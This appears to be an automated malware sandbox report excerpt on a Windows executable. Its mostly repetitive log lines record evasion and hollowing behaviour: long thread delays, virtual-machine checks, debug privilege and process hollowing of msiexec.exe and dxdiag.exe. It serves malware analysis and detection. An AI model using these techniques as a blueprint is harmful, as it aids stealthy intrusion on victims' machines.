Source: C:\Users\user\Desktop\MPkM9Dd99B.exeFile created: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\SIHClient.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6346Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3297Jump to behavior
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsz930C.tmp\nsExec.dllJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2100Thread sleep time: -7378697629483816s >= -30000sJump to behavior
Source: C:\Windows\System32\SIHClient.exe TID: 6712Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\SIHClient.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405A4F
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_00406620 FindFirstFileA,FindClose,0_2_00406620
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeCode function: 0_2_004027CF FindFirstFileA,0_2_004027CF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: ModuleAnalysisCache.2.drBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: ModuleAnalysisCache.2.drBinary or memory string: Add-NetEventVmNetworkAdapter
Source: SIHClient.exe, 00000004.00000003.2001113452.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1617302451.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1616533249.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2000899263.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2002280733.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1619803008.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1620494229.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWs
Source: SIHClient.exe, 00000004.00000003.2001113452.00000220B1F76000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2001113452.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1617302451.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1616533249.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2000899263.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2002280733.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000002.2002280733.00000220B1F76000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1619803008.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.2000899263.00000220B1F76000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000004.00000003.1620494229.00000220B1FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: ModuleAnalysisCache.2.drBinary or memory string: Get-NetEventVmNetworkAdapter
Source: C:\Users\user\Desktop\MPkM9Dd99B.exeAPI call chain: ExitProcess graph end nodegraph_0-3695
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Sample uses process hollowing technique
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Windows\SysWOW64\dxdiag.exe base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: unknown base address: 400000Jump to behavior
